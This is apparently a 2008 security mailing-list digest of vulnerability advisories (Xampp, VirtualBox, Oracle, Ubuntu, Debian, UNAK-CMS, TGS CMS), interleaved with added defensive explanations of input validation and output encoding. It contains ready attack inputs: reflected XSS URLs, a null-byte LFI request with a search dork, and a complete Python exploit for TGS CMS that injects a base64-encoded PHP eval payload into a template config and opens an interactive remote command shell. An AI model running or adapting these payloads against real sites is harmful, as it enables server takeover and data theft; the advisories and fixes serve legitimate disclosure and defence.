Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

2008-08-04 Thread irancrash


Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium



Download From : 
http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Cross Site Scripting Vulnerabilities :

The vulnerability works when register_globals is set to on.

http://Example.com/xampp/iart.php?text=";>><<>>"''alert(document.alert)

http://Example.com/xampp/ming.php?text=";>><<>>"''alert(document.alert)

Solution : Remove the xampp folder or filter the text variable with the htmlspecialchars()
function



Tnx : God

 HTTP://IRCRASH.COM




CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability

2008-08-04 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

  Sun xVM VirtualBox Privilege Escalation Vulnerability


*Advisory Information*

Title: Sun xVM VirtualBox Privilege Escalation Vulnerability
Advisory ID: CORE-2008-0716
Advisory URL:
http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability
Date published: 2008-08-04
Date of last update: 2008-08-04
Vendors contacted: Sun Microsystems
Release mode: Coordinated release


*Vulnerability Information*

Class: Insufficient input validation
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 30481   
CVE Name: CVE-2008-3431 


*Vulnerability Description*

Virtualization technologies allow users to run different operating
systems simultaneously on top of the same set of underlying physical
hardware. This provides several benefits to end users and organizations,
including efficiency gains in the use of hardware resources, reduction
of operational costs, dynamic re-allocation of computing resources and
rapid deployment and configuration of software development and testing
environments.

VirtualBox is an open source virtualization technology project
originally developed by Innotek, a software company based in Germany.

In February 2008 Sun Microsystems announced the acquisition of Innotek
[1] and VirtualBox was integrated into Sun's xVM family of
virtualization technologies. In May 2008, Sun Microsystems announced
that the number of downloads of the open source VirtualBox software
package passed the five million mark [2].

When used on a Windows Host Operating System VirtualBox installs a
kernel driver ('VBoxDrv.sys') to control virtualization of guest
Operating Systems.

An input validation vulnerability was discovered within VirtualBox's
'VBoxDrv.sys' driver that could allow an attacker, with local but
un-privileged access to a host where VirtualBox is installed, to execute
arbitrary code within the kernel of the Windows host operating system
and to gain complete control of a vulnerable computer system.


*Vulnerable Packages*

. Sun xVM VirtualBox 1.6.2.
. Sun xVM VirtualBox 1.6.0.
. This issue only occurs in the Microsoft Windows versions of xVM
VirtualBox.


*Non-vulnerable Packages*

. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows)


*Vendor Information, Solutions and Workarounds*

No workarounds exist for this issue. A security bulletin from the vendor
that describes this issue is available here:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1.


*Credits*

This vulnerability was discovered and researched by Anibal Sacco from
the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies.


*Technical Description / Proof of Concept Code*

When the VirtualBox package is installed on a host the 'VBoxDrv.sys'
driver is loaded on the machine. This driver allows any unprivileged
user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering
mode of METHOD_NEITHER without any kind of validation. This allows
untrusted user mode code to pass arbitrary kernel addresses as arguments
to the driver.

With specially constructed input, a malicious user can use functionality
within the driver to patch kernel addresses and execute arbitrary code
in kernel mode. When handling IOCTLs a communication method must be
pre-defined between the user-mode application and the driver module. The
selected method will determine how the I/O Manager manipulates memory
buffers used in the communication.

The 'METHOD_NEITHER' is a very dangerous method because the pointer
passed to 'DeviceIoControl' as input or output buffer will be sent
directly to the driver, thus transferring to it the responsibility of doing
the proper checks to validate the addresses sent from user mode.

The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method
when handling IOCTL requests and does not properly validate the buffer
sent in the Irp object, allowing an attacker to write to any memory
address in kernel mode.

Let's see the bug in the source. This is the function used to handle the
IOCTL requests in 'SUPDrv-win.cpp'.

/---

  NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP pIrp)
  {
      PSUPDRVDEVEXT       pDevExt  = (PSUPDRVDEVEXT)pDevObj->DeviceExtension;
      PIO_STACK_LOCATION  pStack   = IoGetCurrentIrpStackLocation(pIrp);
      PSUPDRVSESSION      pSession = (PSUPDRVSESSION)pStack->FileObject->FsContext;

      /*
       * Deal with the two high-speed IOCtl that takes it's arguments from
       * the session and iCmd, and only returns a VBox status code.
       */
      ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode;
      if (    ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN
(1)       ||  ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN
          ||  ulCmd == SUP_IOCTL_FAST_DO_NOP)
      {
          KIRQL oldIrql;
          int   rc;

          /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from
             rescheduling us to another CPU
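The advisory's point is that with METHOD_NEITHER the I/O Manager hands the driver raw user-mode pointers (Type3InputBuffer and Irp->UserBuffer) and the driver alone must validate them before the first access. The following is an added model of that validation, written for this digest; it is not VirtualBox or Core Security code. It assumes the 32-bit Windows layout with the default 2 GB user space (so MmUserProbeAddress is 0x7FFF0000), uses a dictionary as a stand-in for memory, and calls no kernel API. dispatch_unchecked reproduces the defect the advisory describes; dispatch_checked shows the probe-then-access pattern that prevents a caller from steering a kernel write to an address of their choosing.

```python
# Added model of METHOD_NEITHER buffer validation. Not VirtualBox/Core code:
# the address constants assume x86 Windows with a 2 GB user space, memory is a
# dict, and ProbeFailure stands in for the SEH exception the real probe raises.

MM_USER_PROBE_ADDRESS = 0x7FFF0000        # x86 MmUserProbeAddress (assumed layout)
ADDRESS_MASK = 0xFFFFFFFF                 # 32-bit pointer arithmetic wraps here

STATUS_SUCCESS = 0x00000000
STATUS_DATATYPE_MISALIGNMENT = 0x80000002
STATUS_ACCESS_VIOLATION = 0xC0000005
STATUS_BUFFER_TOO_SMALL = 0xC0000023

RESULT_CODE = 0x0000BEEF                  # constructed stand-in for the VBox status code


class ProbeFailure(Exception):
    """Stands in for the exception ProbeForRead/ProbeForWrite raise."""

    def __init__(self, status):
        super().__init__(hex(status))
        self.status = status


def probe_user_buffer(address, length, alignment=4):
    """Model of ProbeForWrite: the whole [address, address + length) range must
    lie below MmUserProbeAddress, must not wrap around, and must be aligned."""
    if length == 0:
        return                                   # zero-length buffers are accepted as-is
    if address % alignment:
        raise ProbeFailure(STATUS_DATATYPE_MISALIGNMENT)
    end = (address + length) & ADDRESS_MASK
    if end < address or end > MM_USER_PROBE_ADDRESS:
        raise ProbeFailure(STATUS_ACCESS_VIOLATION)


class FlatMemory:
    """Toy 32-bit address space that remembers which addresses were written."""

    def __init__(self):
        self.cells = {}

    def write_u32(self, address, value):
        for i in range(4):
            self.cells[(address + i) & ADDRESS_MASK] = (value >> (8 * i)) & 0xFF

    def read_u32(self, address):
        return sum(self.cells.get((address + i) & ADDRESS_MASK, 0) << (8 * i) for i in range(4))

    def was_written(self, address):
        return address in self.cells


def dispatch_unchecked(mem, out_buffer, out_length):
    """The defect: the user-supplied output pointer is used exactly as given,
    so a kernel address is written to like any other."""
    mem.write_u32(out_buffer, RESULT_CODE)
    return STATUS_SUCCESS


def dispatch_checked(mem, out_buffer, out_length):
    """Hardened form: probe before the first touch. In a real driver the probe
    and every later access to the buffer sit inside the same __try/__except,
    because the caller can unmap the pages after the probe succeeded."""
    try:
        probe_user_buffer(out_buffer, out_length, alignment=4)
        if out_length < 4:
            return STATUS_BUFFER_TOO_SMALL
        mem.write_u32(out_buffer, RESULT_CODE)   # still inside the guarded region
    except ProbeFailure as exc:
        return exc.status
    return STATUS_SUCCESS
```

The probe is necessary but not sufficient: it only proves the range was user-mode at the instant of the check, so the access itself must stay under the exception handler, and the driver must additionally check the length against what the IOCTL actually needs (the STATUS_BUFFER_TOO_SMALL branch), since METHOD_NEITHER gives it no copied, size-checked system buffer.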

Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN)

2008-08-04 Thread Team SHATTER

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN)

August 4, 2008

Risk Level:
Medium

Affected versions:
Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1

Remote exploitable:
Yes (Authentication to Database Server is needed)

Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL
Injection in the DELETE_TRAN procedure. A malicious user can call the
vulnerable procedure of this package with specially crafted parameters
and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package
SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users
granted DBA have the required privilege. Exploitation of this
vulnerability allows an attacker to execute SQL commands with SYS
privileges.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Restrict access to the SYS.DBMS_DEFER_SYS package.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592

Timeline:
Vendor Notification - 9/24/2007
Vendor Response - 9/28/2007
Fix - 7/15/2008
Public Disclosure - 7/23/2008
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK
O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI
=X2Bp
-END PGP SIGNATURE-


Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter)

2008-08-04 Thread Team SHATTER

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Team SHATTER Security Advisory

Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter)

August 4, 2008

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 10gR1, 10gR2 and 11g (11.1.0.6)

Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.

Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a
legitimate web application into sending malicious code, generally in the
form of a script, to an unsuspecting end user. The attack usually
involves crafting a hyperlink with malicious script code embedded within
it. A valid user is likely to click this link since it points to a
resource on a trusted domain. The link can be posted on a web page, or
sent in an instant message, or email. Clicking on the link executes the
attacker-injected code in the context of the trusted web application.
Typically, the code steals session cookies, which can then be used to
impersonate a valid user.
The "REFRESHCHOICE" parameter used in web pages of Oracle Enterprise
Manager is vulnerable to cross-site scripting attacks. User-supplied
input to this parameter is returned without proper sanitization,
allowing a malicious attacker to inject arbitrary scripting code.

Impact:
Attackers might steal administrator's session cookies, thereby allowing
the attacker to impersonate the valid user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2603

Timeline:
Vendor Notification - 12/27/2007
Vendor Response - 12/27/2007
Fix - 7/15/2008
Public Disclosure - 7/23/2008
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXMa8ACgkQ9EOAcmTuFN33twCfV6yidpr9eAmIbhvBTyY07uE6
RVIAoLKVCD5lsBM0IyksviVGbrhu1tlF
=CyQi
-END PGP SIGNATURE-
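Both reflected XSS reports in this digest (the Xampp 'text' parameter above, whose suggested fix is htmlspecialchars(), and the Oracle Enterprise Manager 'REFRESHCHOICE' parameter in this advisory) come down to the same defect: a request parameter is copied into the page without output encoding. The following is an added example for this digest, not code from Xampp, Oracle or either reporter. It models the PHP pattern in Python: reflected_value reads a parameter the way $_GET[name] (or a bare $name with register_globals on) does, render_unsafe splices it into an attribute, and render_safe encodes it first with html.escape(quote=True), the equivalent of htmlspecialchars($value, ENT_QUOTES). The only input is the string from the Xampp report, URL-encoded as a browser would send it; the parameter names are taken from the two posts.

```python
import html
from urllib.parse import parse_qs, urlencode

# Added example; the only value taken from the posts is the reflected string
# from the Xampp report, used here as constructed sample input for both
# parameter names.
PAYLOAD = "\";>><<>>\"''alert(document.alert)"


def escape_for_html(value: str) -> str:
    """Equivalent of PHP htmlspecialchars($value, ENT_QUOTES):
    &, <, >, " and ' become entities, so the value can neither close the
    attribute nor start a tag."""
    return html.escape(value, quote=True)


def reflected_value(query_string: str, name: str) -> str:
    """Read one query parameter the way a PHP page reads $_GET[name];
    a missing parameter reads as the empty string."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_unsafe(query_string: str, name: str) -> str:
    """The vulnerable pattern: the raw parameter lands inside an attribute."""
    return f'<input type="text" name="{name}" value="{reflected_value(query_string, name)}">'


def render_safe(query_string: str, name: str) -> str:
    """Hardened form: encode at the point of output, for the context the value
    is written into (here an attribute value)."""
    value = escape_for_html(reflected_value(query_string, name))
    return f'<input type="text" name="{name}" value="{value}">'


def attribute_value(rendered: str) -> str:
    """Pull the value="..." attribute back out of a rendered input tag."""
    return rendered.split('value="', 1)[1].rsplit('">', 1)[0]


# Constructed request, URL-encoded as a browser would send it.
SAMPLE_QUERY = urlencode({"text": PAYLOAD, "REFRESHCHOICE": PAYLOAD})
```

Two caveats a practitioner would want: before PHP 5.4, htmlspecialchars() defaulted to ENT_COMPAT and left single quotes alone, so a value placed inside a single-quoted attribute needs ENT_QUOTES explicitly; and entity encoding is only the right answer for HTML element and attribute contexts, not for a value written into a script block, a URL or a CSS property, each of which needs its own encoder.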


Team SHATTER Security Advisory: SQL Injection in Oracle Application Server (WWEXP_API_ENGINE)

2008-08-04 Thread Team SHATTER

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Application Server (WWEXP_API_ENGINE)

August 4, 2008

Risk Level:
High

Affected versions:
Oracle Application Server 9.0.4.3, 10.1.2.2 and 10.1.4.1

Remote exploitable:
Yes (No authentication required)

Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.

Details:
Oracle Application Server installs the PL/SQL package WWEXP_API_ENGINE
owned by PORTAL in the backend Oracle database server. The 'ACTION'
procedure of this package has an instance of SQL Injection that allows
attackers to create anonymous PL/SQL programs and execute any kind of
PL/SQL statements. The statements are executed with the privileges of
the PORTAL user, which has DBA privileges. The vulnerability can be
exploited using a web application and without authentication.

Impact:
Exploitation of this vulnerability allows an unauthenticated attacker on
the Internet to gain full control of a backend Oracle database server
via a vulnerable web site.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

Timeline:
Vendor Notification - 1/3/2008
Vendor Response - 1/8/2008
Fix - 7/15/2008
Public Disclosure - 7/23/2008
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXK0EACgkQ9EOAcmTuFN0XTACfVffmDNUHutUYu0+5G5zks/tG
m3cAn2pILpcdBbr1Rql7zwerfEjMi9m4
=72Cl
-END PGP SIGNATURE-


[USN-626-2] Devhelp, Epiphany, Midbrowser and Yelp update

2008-08-04 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-626-2                        August 04, 2008
devhelp, epiphany-browser, midbrowser, yelp update
https://launchpad.net/bugs/253462
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  devhelp         0.19-1ubuntu1.8.04.3
  epiphany-gecko  2.22.2-0ubuntu0.8.04.5
  midbrowser      0.3.0rc1a-1~8.04.2
  yelp            2.22.1-0ubuntu2.8.04.2

After a standard system upgrade you need to restart Devhelp, Epiphany,
Midbrowser and Yelp to effect the necessary changes.

Details follow:

USN-626-1 fixed vulnerabilities in xulrunner-1.9. The changes required
that Devhelp, Epiphany, Midbrowser and Yelp also be updated to use the
new xulrunner-1.9.

Original advisory details:

 A flaw was discovered in the browser engine. A variable could be made to
 overflow causing the browser to crash. If a user were tricked into opening
 a malicious web page, an attacker could cause a denial of service or
 possibly execute arbitrary code with the privileges of the user invoking
 the program. (CVE-2008-2785)
 
 Billy Rios discovered that Firefox and xulrunner, as used by browsers
 such as Epiphany, did not properly perform URI splitting with pipe
 symbols when passed a command-line URI. If Firefox or xulrunner were
 passed a malicious URL, an attacker may be able to execute local
 content with chrome privileges. (CVE-2008-2933)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.diff.gz
  Size/MD5:31298 9c7bb3906f79ab2c1f190cbefb703f82

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.dsc
  Size/MD5: 1114 bb5bf149ce7b8df7a16d7ab7c411d5ed

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19.orig.tar.gz
  Size/MD5:   675357 3a9cb38f83d7f20391b19e305608f289

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.diff.gz
  Size/MD5:41819 89fa0f8815e04a0f634241b6c1f364d3

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.dsc
  Size/MD5: 1589 61c107f668ad8b4aa25c398b0c93fe1d

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2.orig.tar.gz
  Size/MD5:  7126288 cdc44e20c2ebaba1fe71c1154030dcd9

http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.dsc
  Size/MD5: 1081 fcc8bc8330370aa9df477a6b6f6fb819

http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.tar.gz
  Size/MD5: 46625228 e35bc6b300ba8ba6795cc3c8544c1c70

http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.diff.gz
  Size/MD5:  1268814 35076923ad47e759c7944548421dee51

http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.dsc
  Size/MD5: 1230 bd4fda6dd2e3c57f2db67e635e805a5b
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1.orig.tar.gz
  Size/MD5:  1528478 e97a18f7e002d293394726004fc110b7

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.19-1ubuntu1.8.04.3_all.deb
  Size/MD5:38486 95c5a3b17fd74b4dd632e7c8a2c559ec

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-data_2.22.2-0ubuntu0.8.04.5_all.deb
  Size/MD5:  3296778 b77676d76c4a5ba0728fca33aadc238a

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_2.22.2-0ubuntu0.8.04.5_all.deb
  Size/MD5:   115802 30f9179b2bbeb7fc0170ec9156deedd5

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5_all.deb
  Size/MD5:49494 bb116eb3227198464792497dbf1b1fa3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_amd64.deb
  Size/MD5:17026 5fd05c053b42d0ab1228e97953aa8775

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_amd64.deb
  Size/MD5:   100988 c8f2b1a6898df9a34715ed306ce0f28d

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_amd64.deb
  Size/MD5: 6702 35a0280af7c5ad62333b6ad64c612bd9

http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_amd64.deb
  Size/MD5:  1948612 87efe42bb7facafb8f5c24ecb7d256ef

http://security.ubuntu.com/ubuntu/pool/m

UNAK-CMS Lfi

2008-08-04 Thread r3d . w0rm
#
#  UNAK-CMS Lfi 
#
#   

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))  

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))   

#Our Site : Http://IRCRASH.COM  

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)   

#
#   

#Script Download : www.unak.net 

#   

#DORK : "Powered by UNAK-CMS"   

#   

#
#  [Lfi]

#   

#http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00
#   

#
#   Site : Http://IRCRASH.COM   

## TNX GOD 
##
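The %00 in the request above is the classic null-byte truncation: a path that reaches a C-level open() stops at the NUL, so anything the application appends after the user's input (a forced directory or extension) is silently dropped. The post gives no detail of the connector code, so the following is an added, general example for this digest rather than anything from UNAK-CMS or FCKeditor: a server-side path resolver that rejects NUL bytes, absolute paths and any path that leaves the document root after normalisation and symlink resolution. The root directory and the parameter values other than the one from the post are constructed.

```python
import os
from urllib.parse import unquote

# Constructed document root; nothing from UNAK-CMS itself is reproduced here.
ROOT = "/srv/site/uploads"


def resolve_under_root(root: str, user_path: str) -> str:
    """Return the absolute path a user-supplied (URL-encoded) path refers to,
    or raise ValueError naming the reason it must not be served."""
    decoded = unquote(user_path)                 # one decoding pass, as the web server applied
    if "\x00" in decoded:
        # %00: a C open() stops at the NUL, so any suffix the application
        # appends after the user's input is ignored. PHP >= 5.3.4 and Python's
        # open() refuse such paths, but rejecting them explicitly keeps the
        # error in the application's hands rather than the runtime's.
        raise ValueError("nul-byte")
    if os.path.isabs(decoded):
        raise ValueError("absolute")             # the parameter names a file under root only
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("traversal")            # ../ or a symlink led outside root
    return candidate


def check(user_path: str, root: str = ROOT) -> str:
    """Classify a request: 'ok' or the rejection reason."""
    try:
        resolve_under_root(root, user_path)
        return "ok"
    except ValueError as exc:
        return str(exc)
```

The order of the checks matters: the NUL test runs on the decoded string before any path function sees it, the absolute-path test runs before join() (which would otherwise discard the root), and the containment test uses realpath on both sides so that a symlink inside the root cannot point the resolved path elsewhere. The decoder runs exactly once; a server that has already decoded the query string should be given the decoded value and the unquote call removed, otherwise %2500 would be decoded twice.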


[SECURITY] [DSA 1627-1] New opensc packages fix smart card vulnerability

2008-08-04 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1627-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
August 04, 2008   http://www.debian.org/security/faq
- 

Package: opensc
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-2235

Chaskiel M Grundman discovered that opensc, a library and utilities to
handle smart cards, would initialise smart cards with the Siemens CardOS M4
card operating system without proper access rights. This allowed everyone
to change the card's PIN.

With this bug anyone can change a user PIN without having the PIN or PUK
or the superuser's PIN or PUK. However, it cannot be used to figure out the
PIN. If the PIN on your card is still the same you always had, there's a
reasonable chance that this vulnerability has not been exploited.

This vulnerability affects only smart cards and USB crypto tokens based on
Siemens CardOS M4, and within that group only those that were initialised
with OpenSC. Users of other smart cards and USB crypto tokens, or cards
that have been initialised with some software other than OpenSC, are not
affected.

After upgrading the package, running
pkcs15-tool -T
will show you whether the card is fine or vulnerable. If the card is
vulnerable, you need to update the security setting using:
pkcs15-tool -T -U

For the stable distribution (etch), this problem has been fixed in
version 0.11.1-2etch1.

For the unstable distribution (sid), this problem has been fixed in
version 0.11.4-4.

We recommend that you upgrade your opensc 0.11.1-2etch1 package and check
your card(s) with the command described above.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1.orig.tar.gz
Size/MD5 checksum:  1263611 94ce00a6bda38fac10ab06f5d5d1a8c3
  
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.diff.gz
Size/MD5 checksum:57052 1b58c5d799d40f645ef3b132c49ab383
  http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.dsc
Size/MD5 checksum:  780 f80a316bdbee0c5132a6ac2200a864ca

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_alpha.deb
Size/MD5 checksum:   296980 f58a8caa8c2df06057dc0f404798626d
  
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_alpha.deb
Size/MD5 checksum:   204944 25f4e7077d8e92da0e9f9a8c7a9f243c
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_alpha.deb
Size/MD5 checksum:   727608 12fcf66320b622e2f6887404709b5ab0
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_alpha.deb
Size/MD5 checksum:  1077824 44c113c23321766542c653f23cfa57a6
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_alpha.deb
Size/MD5 checksum:   508220 5853671ce35f9f9d3d9160bdbc715267

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_amd64.deb
Size/MD5 checksum:   576890 ae517b1e8a6e10a0d284c86e470128a9
  
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_amd64.deb
Size/MD5 checksum:   281184 7685b2c13ea0cfe3314d13c1012ead33
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_amd64.deb
Size/MD5 checksum:   483262 ea2c9a29a9983d02709fe3fdab3639c7
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_amd64.deb
Size/MD5 checksum:  1069104 5c79b0e8705ed7c74eead212f3dff5fd
  
http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_amd64.deb
Size/MD5 checksum:   199942 68a206307bc51ef6f0e3354f77c7b689

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_arm.deb
Size/MD5 checksum:   529872 6fcea50e6d9f2798e57b7a95a9d1b32b
  
http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_arm.deb
Size/MD5 checksum:   269136 4d0f5d069408f36662eea22a7162cc12
  
http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_arm.deb
Size/MD5 checksum:   45

TGS CMS Remote Code Execution Exploit

2008-08-04 Thread 0in . email
#   TGS CMS Remote Code Execution Exploit
#   by 0in
#   from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot

# Let's analyze the vuln:
# We've got the: /cms/admin/admin.template_engine.php
# first line:"template_dir= "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir  = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir   = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter  = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom!
# 89:   if (@fwrite($handle,$content)) {

# Just simply exploit for fun:

import httplib
import urllib

print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target+':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
    cmd=raw_input("[shell@"+target+"]#")
    if(cmd=='exit'):
        quit()
    shell=httplib.HTTPConnection(target+':80')
    shell.request("GET",path+"/cms/index.php?zuo="+cmd)
    print shell.getresponse().read()


Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability

2008-08-04 Thread crimson . loyd
